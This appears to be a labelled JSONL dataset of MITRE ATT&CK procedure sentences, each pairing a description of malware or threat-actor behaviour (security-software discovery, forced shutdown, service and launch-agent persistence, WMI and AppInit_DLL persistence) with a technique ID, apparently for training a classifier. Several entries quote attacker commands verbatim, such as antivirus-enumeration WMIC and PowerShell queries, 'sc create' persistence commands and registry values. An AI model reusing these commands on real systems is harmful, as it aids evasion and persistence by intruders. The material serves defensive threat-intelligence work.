{"text1":"Action RAT can identify AV products on an infected host using the following command: `cmd.exe WMIC \/Node:localhost \/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName \/Format:List`.","labels":"['T1518.001']"}
|
|
{"text1":"Amadey has checked for a variety of antivirus products.","labels":"['T1518.001']"}
|
|
{"text1":"Aquatic Panda has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.","labels":"['T1518.001']"}
|
|
{"text1":"Astaroth checks for the presence of Avast antivirus in the \"C:\\Program\\Files\\\" folder.","labels":"['T1518.001']"}
|
|
{"text1":"AuTo Stealer has the ability to collect information about installed AV products from an infected host.","labels":"['T1518.001']"}
|
|
{"text1":"BLUELIGHT can collect a list of anti-virus products installed on a machine.","labels":"['T1518.001']"}
|
|
{"text1":"Bazar can identify the installed antivirus engine.","labels":"['T1518.001']"}
|
|
{"text1":"CHOPSTICK checks for antivirus and forensics software.","labels":"['T1518.001']"}
|
|
{"text1":"Clop can search for processes with antivirus and antimalware product names.","labels":"['T1518.001']"}
|
|
{"text1":"Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.","labels":"['T1518.001']"}
|
|
{"text1":"Comnie attempts to detect several anti-virus products.","labels":"['T1518.001']"}
|
|
{"text1":"DarkWatchman can search for anti-virus products on the system.","labels":"['T1518.001']"}
|
|
{"text1":"Darkhotel has searched for anti-malware strings and anti-virus processes running on the system.","labels":"['T1518.001']"}
|
|
{"text1":"During Frankenstein, the threat actors used WMI queries to determine if analysis tools were running on a compromised system.","labels":"['T1518.001']"}
|
|
{"text1":"During Operation Wocao, threat actors used scripts to detect security software.","labels":"['T1518.001']"}
|
|
{"text1":"EVILNUM can search for anti-virus products on the system.","labels":"['T1518.001']"}
|
|
{"text1":"Empire can enumerate antivirus software on the target.","labels":"['T1518.001']"}
|
|
{"text1":"Epic searches for anti-malware services running on the victim\u2019s machine and terminates itself if it finds them.","labels":"['T1518.001']"}
|
|
{"text1":"EvilBunny has been observed querying installed antivirus software.","labels":"['T1518.001']"}
|
|
{"text1":"FELIXROOT checks for installed security software like antivirus and firewall.","labels":"['T1518.001']"}
|
|
{"text1":"FIN8 has used Registry keys to detect and avoid executing in potential sandboxes.","labels":"['T1518.001']"}
|
|
{"text1":"Felismus checks for processes associated with anti-virus vendors.","labels":"['T1518.001']"}
|
|
{"text1":"FinFisher probes the system to check for antimalware processes.","labels":"['T1518.001']"}
|
|
{"text1":"Flame identifies security software such as antivirus through the Security module.","labels":"['T1518.001']"}
|
|
{"text1":"FlawedAmmyy will attempt to detect anti-virus products during the initial infection.","labels":"['T1518.001']"}
|
|
{"text1":"Frankenstein has used WMI queries to detect if virtualization environments or analysis tools were running on the system.","labels":"['T1518.001']"}
|
|
{"text1":"FunnyDream can identify the processes for Bkav antivirus.","labels":"['T1518.001']"}
|
|
{"text1":"Gelsemium can check for the presence of specific security products.","labels":"['T1518.001']"}
|
|
{"text1":"Gold Dragon checks for anti-malware products and processes.","labels":"['T1518.001']"}
|
|
{"text1":"Grandoreiro can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.","labels":"['T1518.001']"}
|
|
{"text1":"InvisiMole can check for the presence of network sniffers, AV, and BitDefender firewall.","labels":"['T1518.001']"}
|
|
{"text1":"JPIN checks for the presence of certain security-related processes and deletes its installer\/uninstaller component if it identifies any of them.","labels":"['T1518.001']"}
|
|
{"text1":"Kimsuky has checked for the presence of antivirus software with \"powershell Get-CimInstance -Namespace root\/securityCenter2 \u2013 classname antivirusproduct\".","labels":"['T1518.001']"}
|
|
{"text1":"LiteDuke has the ability to check for the presence of Kaspersky security software.","labels":"['T1518.001']"}
|
|
{"text1":"LitePower can identify installed AV software.","labels":"['T1518.001']"}
|
|
{"text1":"MarkiRAT can check for running processes on the victim\u2019s machine to look for Kaspersky and Bitdefender antivirus products.","labels":"['T1518.001']"}
|
|
{"text1":"Meteor has the ability to search for Kaspersky Antivirus on a victim's machine.","labels":"['T1518.001']"}
|
|
{"text1":"More_eggs can obtain information on installed anti-malware programs.","labels":"['T1518.001']"}
|
|
{"text1":"MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.","labels":"['T1518.001']"}
|
|
{"text1":"Naikon uses commands such as \"netsh advfirewall firewall\" to discover local firewall settings.","labels":"['T1518.001']"}
|
|
{"text1":"Netwalker can detect and terminate active security software-related processes on infected systems.","labels":"['T1518.001', 'T1562.001']"}
|
|
{"text1":"NotPetya determines if specific antivirus programs are running on an infected host machine.","labels":"['T1518.001']"}
|
|
{"text1":"POWERSTATS has detected security tools.","labels":"['T1518.001']"}
|
|
{"text1":"POWRUNER may collect information on the victim's anti-virus software.","labels":"['T1518.001']"}
|
|
{"text1":"PUNCHBUGGY can gather AVs registered in the system.","labels":"['T1518.001']"}
|
|
{"text1":"Patchwork scanned the \u201cProgram Files\u201d directories for a directory with the string \u201cTotal Security\u201d (the installation path of the \u201c360 Total Security\u201d antivirus tool).","labels":"['T1518.001']"}
|
|
{"text1":"PipeMon can check for the presence of ESET and Kaspersky security software.","labels":"['T1518.001']"}
|
|
{"text1":"QakBot can identify the installed antivirus product on a targeted system.","labels":"['T1518.001']"}
|
|
{"text1":"RTM can obtain information about security software on the victim.","labels":"['T1518.001']"}
|
|
{"text1":"Remsec has a plugin to detect active drivers of some security products.","labels":"['T1518.001']"}
|
|
{"text1":"Rocke used scripts which detected and uninstalled antivirus software.","labels":"['T1518.001', 'T1562.001']"}
|
|
{"text1":"SILENTTRINITY can determine if an anti-virus product is installed through the resolution of the service's virtual SID.","labels":"['T1518.001']"}
|
|
{"text1":"SUNBURST checked for a variety of antivirus\/endpoint detection agents prior to execution.","labels":"['T1518.001']"}
|
|
{"text1":"SideCopy uses a loader DLL file to collect AV product names from an infected host.","labels":"['T1518.001']"}
|
|
{"text1":"Sidewinder has used the Windows service \"winmgmts:\\\\.\\root\\SecurityCenter2\" to check installed antivirus products.","labels":"['T1518.001']"}
|
|
{"text1":"Skidmap has the ability to check if \"\/usr\/sbin\/setenforce\" exists. This file controls what mode SELinux is in.","labels":"['T1518.001']"}
|
|
{"text1":"StoneDrill can check for antivirus and antimalware programs.","labels":"['T1518.001']"}
|
|
{"text1":"T9000 performs checks for various antivirus and security products during installation.","labels":"['T1518.001']"}
|
|
{"text1":"Tasklist can be used to enumerate security software currently running on a system by process name of known products.","labels":"['T1518.001']"}
|
|
{"text1":"TeamTNT has searched for security products on infected machines.","labels":"['T1518.001']"}
|
|
{"text1":"The White Company has checked for specific antivirus products on the target\u2019s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET.","labels":"['T1518.001']"}
|
|
{"text1":"The main CozyCar dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.","labels":"['T1518.001']"}
|
|
{"text1":"ThiefQuest uses the \"kill_unwanted\" function to get a list of running processes, compares each process with an encrypted list of \u201cunwanted\u201d security related programs, and kills the processes for security related programs.","labels":"['T1518.001']"}
|
|
{"text1":"Tropic Trooper can search for anti-virus software running on the system.","labels":"['T1518.001']"}
|
|
{"text1":"Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected.","labels":"['T1518.001']"}
|
|
{"text1":"Valak can determine if a compromised host has security products installed.","labels":"['T1518.001']"}
|
|
{"text1":"Waterbear can find the presence of a specific security software.","labels":"['T1518.001']"}
|
|
{"text1":"WhisperGate can recognize the presence of monitoring tools on a target system.","labels":"['T1518.001']"}
|
|
{"text1":"Windshift has used malware to identify installed AV and commonly used forensic and malware analysis tools.","labels":"['T1518.001']"}
|
|
{"text1":"Wingbird checks for the presence of Bitdefender security software.","labels":"['T1518.001']"}
|
|
{"text1":"Wizard Spider has used WMI to identify anti-virus products installed on a victim's machine.","labels":"['T1518.001']"}
|
|
{"text1":"Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim\u2019s environment.","labels":"['T1518.001']"}
|
|
{"text1":"down_new has the ability to detect anti-virus products and processes on a compromised host.","labels":"['T1518.001']"}
|
|
{"text1":"jRAT can list security software, such as by using WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.","labels":"['T1518.001']"}
|
|
{"text1":"netsh can be used to discover system firewall settings.","labels":"['T1518.001']"}
|
|
{"text1":"xCaon has checked for the existence of Kaspersky antivirus software on the system.","labels":"['T1518.001']"}
|
|
{"text1":"AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.","labels":"['T1526']"}
|
|
{"text1":"APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as \"Google Defender\" \"Google Email Protection,\" and \"Google Scanner\" for Gmail users. They also targeted Yahoo users with applications masquerading as \"Delivery Service\" and \"McAfee Email Protection\".","labels":"['T1528']"}
|
|
{"text1":"Peirates gathers Kubernetes service account tokens using a variety of techniques.","labels":"['T1528']"}
|
|
{"text1":"APT37 has used malware that will issue the command \"shutdown \/r \/t 1\" to reboot a system after wiping its MBR.","labels":"['T1529']"}
|
|
{"text1":"APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.","labels":"['T1529']"}
|
|
{"text1":"DCSrv has a function to sleep for two hours before rebooting the system.","labels":"['T1529']"}
|
|
{"text1":"DustySky can shutdown the infected machine.","labels":"['T1529']"}
|
|
{"text1":"KillDisk attempts to reboot the machine by terminating specific processes.","labels":"['T1529']"}
|
|
{"text1":"LockerGoga has been observed shutting down infected systems.","labels":"['T1529']"}
|
|
{"text1":"LookBack can shutdown and reboot the victim machine.","labels":"['T1529']"}
|
|
{"text1":"NotPetya will reboot the system one hour after infection.","labels":"['T1529']"}
|
|
{"text1":"Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.","labels":"['T1530']"}
|
|
{"text1":"LAPSUS$ has removed a targeted organization's global admin accounts to lock the organization out of all access.","labels":"['T1531']"}
|
|
{"text1":"LockerGoga has been observed changing account passwords and logging off current users.","labels":"['T1531']"}
|
|
{"text1":"Meteor has the ability to change the password of local users on compromised hosts and can log off users.","labels":"['T1531']"}
|
|
{"text1":"HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.","labels":"['T1534']"}
|
|
{"text1":"Kimsuky has sent internal spearphishing emails for lateral movement after stealing victim information.","labels":"['T1534']"}
|
|
{"text1":"Lazarus Group has conducted internal spearphishing from within a compromised organization.","labels":"['T1534']"}
|
|
{"text1":"Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.","labels":"['T1534']"}
|
|
{"text1":"APT29 has stolen Chrome browser cookies by copying the Chrome profile directories of targeted users.","labels":"['T1539']"}
|
|
{"text1":"BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.","labels":"['T1539']"}
|
|
{"text1":"Chaes has used a script that extracts the web session cookie and sends it to the C2 server.","labels":"['T1539']"}
|
|
{"text1":"CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim\u2019s machine.","labels":"['T1539']"}
|
|
{"text1":"EVILNUM can harvest cookies and upload them to the C2 server.","labels":"['T1539']"}
|
|
{"text1":"Evilnum can steal cookies and session information from browsers.","labels":"['T1539']"}
|
|
{"text1":"Grandoreiro can steal the victim's cookies to use for duplicating the active session from another device.","labels":"['T1539']"}
|
|
{"text1":"QakBot has the ability to capture web session cookies.","labels":"['T1539']"}
|
|
{"text1":"XCSSET uses \"scp\" to access the \"~\/Library\/Cookies\/Cookies.binarycookies\" file.","labels":"['T1539']"}
|
|
{"text1":"Cyclops Blink has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices.","labels":"['T1542.002']"}
|
|
{"text1":"Equation is known to have the capability to overwrite the firmware on hard drives from some manufacturers.","labels":"['T1542.002']"}
|
|
{"text1":"APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim. The bootkit shares code with some variants of BlackEnergy.","labels":"['T1542.003']"}
|
|
{"text1":"APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.","labels":"['T1542.003']"}
|
|
{"text1":"BOOTRASH is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.","labels":"['T1542.003']"}
|
|
{"text1":"Carberp has installed a bootkit on the system to maintain persistence.","labels":"['T1542.003']"}
|
|
{"text1":"Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.","labels":"['T1542.003']"}
|
|
{"text1":"ROCKBOOT is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence.","labels":"['T1542.003']"}
|
|
{"text1":"Some FinFisher variants incorporate an MBR rootkit.","labels":"['T1542.003']"}
|
|
{"text1":"TrickBot can implant malicious code into a compromised device's firmware.","labels":"['T1542.003']"}
|
|
{"text1":"Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.","labels":"['T1543']"}
|
|
{"text1":"FatDuke has the ability to create a process.","labels":"['T1543']"}
|
|
{"text1":"MiniDuke can create a process on a compromised host.","labels":"['T1543']"}
|
|
{"text1":"Bundlore can persist via a LaunchAgent.","labels":"['T1543.001']"}
|
|
{"text1":"CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.","labels":"['T1543.001']"}
|
|
{"text1":"CookieMiner has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.","labels":"['T1543.001']"}
|
|
{"text1":"CrossRAT creates a Launch Agent on macOS.","labels":"['T1543.001']"}
|
|
{"text1":"FruitFly persists via a Launch Agent.","labels":"['T1543.001']"}
|
|
{"text1":"Keydnap uses a Launch Agent to persist.","labels":"['T1543.001']"}
|
|
{"text1":"MacMa installs a `com.apple.softwareupdate.plist` file in the `\/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, MacMa is executed from `\/var\/root\/.local\/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the MacMa only runs when there is a logged in GUI user.","labels":"['T1543.001']"}
|
|
{"text1":"MacSpy persists via a Launch Agent.","labels":"['T1543.001']"}
|
|
{"text1":"NETWIRE can use launch agents for persistence.","labels":"['T1543.001']"}
|
|
{"text1":"The Komplex trojan creates a persistent launch agent at \"$HOME\/Library\/LaunchAgents\/com.apple.updates.plist\" and loads it with \"launchctl load -w ~\/Library\/LaunchAgents\/com.apple.updates.plist\".","labels":"['T1543.001']"}
|
|
{"text1":"Exaramel for Linux has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.","labels":"['T1543.002']"}
|
|
{"text1":"Hildegard has started a monero service.","labels":"['T1543.002']"}
|
|
{"text1":"Pupy can be used to establish persistence using a systemd service.","labels":"['T1543.002']"}
|
|
{"text1":"Rocke has installed a systemd service script to maintain persistence.","labels":"['T1543.002']"}
|
|
{"text1":"A Threat Group-3390 tool can create a new service, naming it after the config information, to gain persistence.","labels":"['T1543.003']"}
|
|
{"text1":"APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"APT38 has installed a new Windows service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"APT41 modified legitimate Windows services to install malware backdoors. APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.","labels":"['T1543.003']"}
|
|
{"text1":"An APT19 Port 22 malware variant registers itself as a service.","labels":"['T1543.003']"}
|
|
{"text1":"Anchor can establish persistence by creating a service.","labels":"['T1543.003']"}
|
|
{"text1":"Attor's dispatcher can establish persistence by registering a new service.","labels":"['T1543.003']"}
|
|
{"text1":"AuditCred is installed as a new service on the system.","labels":"['T1543.003']"}
|
|
{"text1":"BBSRAT can modify service configurations.","labels":"['T1543.003']"}
|
|
{"text1":"Bankshot can terminate a specific process by its process id.","labels":"['T1543.003']"}
|
|
{"text1":"Bisonal has been modified to be used as a Windows service.","labels":"['T1543.003']"}
|
|
{"text1":"BitPaymer has attempted to install itself as a service to maintain persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Blue Mockingbird has made their XMRIG payloads persistent as a Windows Service.","labels":"['T1543.003']"}
|
|
{"text1":"Briba installs a service pointing to a malicious DLL dropped to disk.","labels":"['T1543.003']"}
|
|
{"text1":"Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine.","labels":"['T1543.003']"}
|
|
{"text1":"Catchamas adds a new service named NetAdapter to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Clambling can register itself as a system service to gain persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Conficker copies itself into the \"%systemroot%\\system32\" directory and registers as a service.","labels":"['T1543.003']"}
|
|
{"text1":"CosmicDuke uses Windows services typically named \"javamtsup\" for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Cuba can modify services by using the \"OpenService\" and \"ChangeServiceConfig\" functions.","labels":"['T1543.003']"}
|
|
{"text1":"DCSrv has created new services for persistence by modifying the Registry.","labels":"['T1543.003']"}
|
|
{"text1":"DarkVishnya created new services for shellcode loaders distribution.","labels":"['T1543.003']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Dyre registers itself as a service by adding several Registry keys.","labels":"['T1543.003']"}
|
|
{"text1":"Earth Lusca created a service using the command \"sc create \u201cSysUpdate\u201d binpath= \u201ccmd \/c start \u201c[file path]\u201d\u201d&&sc config \u201cSysUpdate\u201d start= auto&&net start SysUpdate\" for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Elise configures itself as a service.","labels":"['T1543.003']"}
|
|
{"text1":"Emissary is capable of configuring itself as a service.","labels":"['T1543.003']"}
|
|
{"text1":"Emotet has been observed creating new services to maintain persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Empire can utilize built-in modules to modify service binaries and restore them to their original state.","labels":"['T1543.003']"}
|
|
{"text1":"FALLCHILL has been installed as a Windows service.","labels":"['T1543.003']"}
|
|
{"text1":"FIN7 created new Windows services and added them to the startup directories for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"FinFisher creates a new Windows service with the malicious executable for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"FunnyDream has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.","labels":"['T1543.003']"}
|
|
{"text1":"Honeybee has batch files that modify the system service COMSysApp to load a malicious DLL.","labels":"['T1543.003']"}
|
|
{"text1":"Hydraq creates new services to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"If running as administrator, TDTESS installs itself as a new service named bmwappushservice to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"InvisiMole can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.","labels":"['T1543.003']"}
|
|
{"text1":"JHUHUGIT has registered itself as a service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Kazuar can install itself as a new service.","labels":"['T1543.003']"}
|
|
{"text1":"Ke3chang backdoor RoyalDNS established persistence through adding a service called \"Nwsapagent\".","labels":"['T1543.003']"}
|
|
{"text1":"KeyBoy installs a service pointing to a malicious DLL dropped to disk.","labels":"['T1543.003']"}
|
|
{"text1":"Kimsuky has created new services for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"LoudMiner can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.","labels":"['T1543.003']"}
|
|
{"text1":"MoonWind installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.","labels":"['T1543.003']"}
|
|
{"text1":"Naid creates a new service to establish.","labels":"['T1543.003']"}
|
|
{"text1":"Nebulae can create a service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Nidiran can create a new service named msamger (Microsoft Security Accounts Manager).","labels":"['T1543.003']"}
|
|
{"text1":"One variant of BlackEnergy creates a new service using either a hard-coded or randomly generated name.","labels":"['T1543.003']"}
|
|
{"text1":"PROMETHIUM has created new services and modified existing services for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Pandora has the ability to gain system privileges through Windows services.","labels":"['T1543.003']"}
|
|
{"text1":"PingPull has the ability to install itself as a service.","labels":"['T1543.003']"}
|
|
{"text1":"PlugX can be added as a service to establish persistence. PlugX also has a module to change service configurations as well as start, control, and delete services.","labels":"['T1543.003']"}
|
|
{"text1":"PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace\/modify service binaries, paths, and configs.","labels":"['T1543.003']"}
|
|
{"text1":"PsExec can leverage Windows services to escalate privileges from administrator to SYSTEM with the \"-s\" argument.","labels":"['T1543.003']"}
|
|
{"text1":"RDAT has created a service when it is installed on the victim machine.","labels":"['T1543.003']"}
|
|
{"text1":"Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver.","labels":"['T1543.003']"}
|
|
{"text1":"RawPOS installs itself as a service to maintain persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Reaver installs itself as a new service.","labels":"['T1543.003']"}
|
|
{"text1":"SLOTHFULMEDIA has created a service on victim machines named \"TaskFrame\" to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"STARWHALE has the ability to create the following Windows service to establish persistence on an infected host: `sc create Windowscarpstss binpath= \"cmd.exe \/c cscript.exe c:\\\\windows\\\\system32\\\\w7_1.wsf humpback_whale\" start= \"auto\" obj= \"LocalSystem\"`.","labels":"['T1543.003']"}
|
|
{"text1":"SUGARUSH has created a service named `Service1` for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Several Lazarus Group malware families install themselves as new services.","labels":"['T1543.003']"}
|
|
{"text1":"Shamoon creates a new service named \u201cntssrv\u201d to execute the payload. Newer versions create the \"MaintenaceSrv\" and \"hdv_725x\" services.","labels":"['T1543.003']"}
|
|
{"text1":"ShimRat has installed a Windows service to maintain persistence on victim machines.","labels":"['T1543.003']"}
|
|
{"text1":"Some InnaputRAT variants create a new Windows service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Some Sakula samples install themselves as services for persistence by calling WinExec with the \"net start\" argument.","labels":"['T1543.003']"}
|
|
{"text1":"StreamEx establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.","labels":"['T1543.003']"}
|
|
{"text1":"Stuxnet uses a driver registered as a boot start service as the main load-point.","labels":"['T1543.003']"}
|
|
{"text1":"TEARDROP ran as a Windows service from the \"c:\\windows\\syswow64\" folder.","labels":"['T1543.003']"}
|
|
{"text1":"TYPEFRAME variants can add malicious DLL modules as new services. TYPEFRAME can also delete services from the victim\u2019s machine.","labels":"['T1543.003']"}
|
|
{"text1":"The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description \u201cWindows Check AV.\u201d","labels":"['T1543.003']"}
|
|
{"text1":"ThreatNeedle can run in memory and register its payload as a Windows service.","labels":"['T1543.003']"}
|
|
{"text1":"TinyZBot can install as a Windows service for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"To establish persistence, Okrum can install itself as a new service named NtmSsvc.","labels":"['T1543.003']"}
|
|
{"text1":"TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.","labels":"['T1543.003']"}
|
|
{"text1":"Tropic Trooper has installed a service pointing to a malicious DLL dropped to disk.","labels":"['T1543.003']"}
|
|
{"text1":"Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some Volgmer variants also install .dll files as services with names generated by a list of hard-coded strings.","labels":"['T1543.003']"}
|
|
{"text1":"WastedLocker created and established a service that runs until the encryption process is complete.","labels":"['T1543.003']"}
|
|
{"text1":"Wingbird uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file.","labels":"['T1543.003', 'T1569.002']"}
|
|
{"text1":"Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"Wizard Spider has installed TrickBot as a service named ControlServiceA in order to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"ZLib creates Registry keys to allow itself to run as various services.","labels":"['T1543.003']"}
|
|
{"text1":"ZxShell can create a new service using the service parser function ProcessScCommand.","labels":"['T1543.003']"}
|
|
{"text1":"gh0st RAT can create a new service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"hcdLoader installs itself as a service for persistence.","labels":"['T1543.003']"}
|
|
{"text1":"AppleJeus has placed a plist file within the \"LaunchDaemons\" folder and launched it manually.","labels":"['T1543.004']"}
|
|
{"text1":"Bundlore can persist via a LaunchDaemon.","labels":"['T1543.004']"}
|
|
{"text1":"Dacls can establish persistence via a Launch Daemon.","labels":"['T1543.004']"}
|
|
{"text1":"If running with \"root\" permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder \"\/Library\/LaunchDaemons\".","labels":"['T1543.004']"}
|
|
{"text1":"When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the \"\/Library\/LaunchDaemons\/\" folder with the \"RunAtLoad\" key set to \"true\" establishing persistence as a Launch Daemon.","labels":"['T1543.004']"}
|
|
{"text1":"XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.","labels":"['T1543.004']"}
|
|
{"text1":"Kimsuky has a HWP document stealer module which changes the default program association in the registry to open HWP documents.","labels":"['T1546.001']"}
|
|
{"text1":"SILENTTRINITY can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process.","labels":"['T1546.001']"}
|
|
{"text1":"Gazer can establish persistence through the system screensaver by configuring it to execute the malware.","labels":"['T1546.002']"}
|
|
{"text1":"APT29 has used WMI event subscriptions for persistence.","labels":"['T1546.003']"}
|
|
{"text1":"APT33 has attempted to use WMI event subscriptions to establish persistence on compromised hosts.","labels":"['T1546.003']"}
|
|
{"text1":"Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.","labels":"['T1546.003']"}
|
|
{"text1":"Leviathan has used WMI for persistence.","labels":"['T1546.003']"}
|
|
{"text1":"Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.","labels":"['T1546.003']"}
|
|
{"text1":"POSHSPY uses a WMI event subscription to establish persistence.","labels":"['T1546.003']"}
|
|
{"text1":"POWERTON can use WMI for persistence.","labels":"['T1546.003']"}
|
|
{"text1":"SILENTTRINITY can create a WMI Event to execute a payload for persistence.","labels":"['T1546.003']"}
|
|
{"text1":"SeaDuke uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.","labels":"['T1546.003']"}
|
|
{"text1":"TrailBlazer has the ability to use WMI for persistence.","labels":"['T1546.003']"}
|
|
{"text1":"Turla has used WMI event filters and consumers to establish persistence.","labels":"['T1546.003']"}
|
|
{"text1":"UNC2452 used WMI event subscriptions for persistence.","labels":"['T1546.003']"}
|
|
{"text1":"adbupd can use a WMI script to achieve persistence.","labels":"['T1546.003']"}
|
|
{"text1":"Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells.","labels":"['T1546.004']"}
|
|
{"text1":"Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.","labels":"['T1546.004']"}
|
|
{"text1":"APT29 used sticky-keys to obtain unauthenticated, privileged console access.","labels":"['T1546.008']"}
|
|
{"text1":"APT3 replaces the Sticky Keys binary \"C:\\Windows\\System32\\sethc.exe\" for persistence.","labels":"['T1546.008']"}
|
|
{"text1":"APT41 leveraged sticky keys to establish persistence.","labels":"['T1546.008']"}
|
|
{"text1":"Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.","labels":"['T1546.008']"}
|
|
{"text1":"Honeybee's service-based DLL implant can execute a downloaded file with parameters specified using \"CreateProcessAsUser\".","labels":"['T1546.009']"}
|
|
{"text1":"PUNCHBUGGY can establish persistence using an AppCertDLLs Registry key.","labels":"['T1546.009']"}
|
|
{"text1":"APT39 has used malware to set \"LoadAppInit_DLLs\" in the Registry key \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" in order to establish persistence.","labels":"['T1546.010']"}
|
|
{"text1":"If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs \u2013 %APPDATA%\\Intel\\ResN32.dll\" and \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs \u2013 0x1\".","labels":"['T1546.010']"}
|
|
{"text1":"Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key.","labels":"['T1546.010']"}
|
|
{"text1":"Some variants of Cherry Picker use AppInit_DLLs to achieve persistence by creating the following Registry key: \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"\"","labels":"['T1546.010']"}
|
|
{"text1":"Pillowmint has used a malicious shim database to maintain persistence.","labels":"['T1546.011']"}
|
|
{"text1":"ShimRat has installed shim databases in the \"AppPatch\" folder.","labels":"['T1546.011']"}
|
|
{"text1":"SDBbot has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.","labels":"['T1546.012']"}
|
|
{"text1":"TEMP.Veles has modified and added entries within \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" to maintain persistence.","labels":"['T1546.012']"}
|
|
{"text1":"Turla has used PowerShell profiles to maintain persistence on an infected machine.","labels":"['T1546.013']"}
|
|
